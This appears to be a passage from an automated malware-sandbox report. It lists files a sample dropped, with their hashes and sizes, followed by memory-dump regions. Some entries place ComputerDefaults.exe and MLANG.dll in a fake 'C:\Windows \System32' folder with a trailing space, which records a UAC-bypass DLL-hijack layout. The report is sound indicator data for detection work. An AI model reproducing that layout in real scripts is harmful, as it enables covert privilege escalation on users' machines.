8a3f5576aa24b482893f82c3afb5d85e7e21403b

SHA256
24a3119959ed8d427f367bca556560b4d61707f01ebc8a2a22507ad448c4a655

SHA512
87da8921120d5ea86d8168149738e273158434901e3da44adca46022a059123ffeb1121225fcc4145c0e854c2725b4c68ae3b9a8d117362ee7bbcfdad325dacd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
dd72642a2cca22190ec246a0ee32e15e

SHA1
3cd7b24f387838f8b5864a3a039d782798f2db51

SHA256
e37bf110a4331fa4b06b501542b09333e15bb07684f7d0edef18dc92677ee470

SHA512
2a155bb07bbf35afbd9813943fff5f38503fb9fb274a07b19971741569a4cc56a24ac4961a39c6f43979856c237bd91e84b4d951a82d7fa4c90080e87e5f68f4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
722c887e5b94064dbf6a2022092aa32e

SHA1
54b70c86dccbe4715ea03752f5da745b1299586d

SHA256
eeeb8610996ab856bb8b9de6a384efa356e87568ecb2eb70fdc0a00b41688c80

SHA512
61898f9b497dcc71c96f4a14e5a18ceeeb77f832eb56ebcdc472bd48ed763295649f4a120926d28767e05cb0ea97008d67fd00e0148958389df36bf12521e37c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9d662ecae338ca923a784422a86e9925

SHA1
ccdbbd6f3a1801b13f503d92f5d48fe5041ab495

SHA256
af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e

SHA512
5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
26ca60dbfd9bbd24d9481d0073fd2143

SHA1
f157f253d994ac36dd5855f239c30b0815a1c192

SHA256
46511d8fb79b17d2c422bab2fd9b3f6532b8bc2f92da7e291036270f6d00684c

SHA512
af410d49bbf3f9df28c42c4ecf6bb1067dd58dc4344b01fce03b5455673512907f74f257441c189c2082dbf1a1f1316b62e1e3c072d0e1f34e3dff37d8cbea22

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
97748f71ed95026706014e8524266292

SHA1
f60663ea2e2a778c57d07d9678fe04c79c3ff942

SHA256
f1320df712bf0d218f62a481ea318abfaba12a6465f9d2e07a6ead9d9bd28d9f

SHA512
b6df8e3eea09cdd6964bb7801a615df38a3043a2961176ec275fef531a8378fd0d21ee96d01165d192b32d0eddc021ad82fa609ab216005a60bf42b79e1e86c9

Download Submit
C:\Users\Admin\AppData\Local\Temp\SC.cmd

Filesize
156KB

MD5
c88c0f71749f8575068070333359f5b5

SHA1
af3cbd68266ab3b90bef8db45f8e22e1f4d9d121

SHA256
d1a6da3bb5b455c45056ff4b7e29270c29728e6e1add468a9a3e8ff88d6c3afb

SHA512
da549a0f953591baf4021dfb09f6b3afc0ff93dc58c430b90688583c5c43808393506389d97668b5f5d923b8258154d0a66c7f33ddaef7667bbf05fb45ef2fa4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xm2fxh4t.5yh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd

Filesize
1.6MB

MD5
d7239bc304b1d9d4ae192e2570419d53

SHA1
dccb1c1c8021d791852cd5c0dc5c6240be0ed2d1

SHA256
7543e6925701f6fde75accb15f483991596b55260b720ba7dbc84cc48eeb27aa

SHA512
d52dde51b91d287c750e85828ce4dd7a46e0ea2235fd6e63d4e7588745f7e34c198827cccb2d719525ecea5e92a8804377ca193b2d3e1e0e986d4f77d8dd4430

Download Submit
C:\Windows \System32\ComputerDefaults.exe

Filesize
80KB

MD5
d25a9e160e3b74ef2242023726f15416

SHA1
27a9bb9d7628d442f9b5cf47711c906e3315755b

SHA256
7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c

SHA512
bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

Download Submit
C:\Windows \System32\MLANG.dll

Filesize
131KB

MD5
3fe8b70f96a80f2735fe33b4bc13279e

SHA1
0dad73147db553deabd9794779109fa79ae5b656

SHA256
52b4a57474ce6ead77d4207ce740d95c9ca3c0c9b72b243a68484b4c49465f26

SHA512
3704b317a4c79b6795f6e88e3a1133b7b10a3a4dd48e93e99c85403e485b84d09c64e562a8887eaf816810777314876be4d8e083b0246e2de4a7fddc4e6c24bd

Download Submit
memory/1748-29-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download
memory/1748-26-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download
memory/1748-25-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download
memory/1748-24-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download
memory/2652-95-0x000001DC5FCF0000-0x000001DC5FEB2000-memory.dmp

Filesize
1.8MB

Download
memory/2652-99-0x000001DC5F660000-0x000001DC5F672000-memory.dmp

Filesize
72KB

Download
memory/2652-101-0x000001DC5F6C0000-0x000001DC5F6FC000-memory.dmp

Filesize
240KB

Download
memory/2652-90-0x000001DC5E850000-0x000001DC5E85C000-memory.dmp

Filesize
48KB

Download
memory/2652-91-0x000001DC5EBD0000-0x000001DC5ED02000-memory.dmp

Filesize
1.2MB

Download
memory/2652-92-0x000001DC5ED00000-0x000001DC5F024000-memory.dmp

Filesize
3.1MB

Download
memory/2652-93-0x000001DC5F610000-0x000001DC5F660000-memory.dmp

Filesize
320KB

Download
memory/2652-94-0x000001DC5F720000-0x000001DC5F7D2000-memory.dmp

Filesize
712KB

Download
memory/2716-142-0x000001F7E8B80000-0x000001F7E8B8E000-memory.dmp

Filesize
56KB

Download
memory/5028-0-0x00007FFBF2683000-0x00007FFBF2685000-memory.dmp

Filesize
8KB

Download
memory/5028-48-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download
memory/5028-47-0x00007FFBF2683000-0x00007FFBF2685000-memory.dmp

Filesize
8KB

Download
memory/5028-31-0x000001A8A6B40000-0x000001A8A6B5E000-memory.dmp

Filesize
120KB

Download
memory/5028-30-0x000001A8A67D0000-0x000001A8A67DC000-memory.dmp

Filesize
48KB

Download
memory/5028-14-0x000001A8A6C50000-0x000001A8A6CC6000-memory.dmp

Filesize
472KB

Download
memory/5028-13-0x000001A8A6B80000-0x000001A8A6BC4000-memory.dmp

Filesize
272KB

Download
memory/5028-12-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download
memory/5028-11-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download
memory/5028-6-0x000001A8A44D0000-0x000001A8A44F2000-memory.dmp

Filesize
136KB

Download
memory/5028-194-0x00007FFBF2680000-0x00007FFBF3141000-memory.dmp

Filesize
10.8MB

Download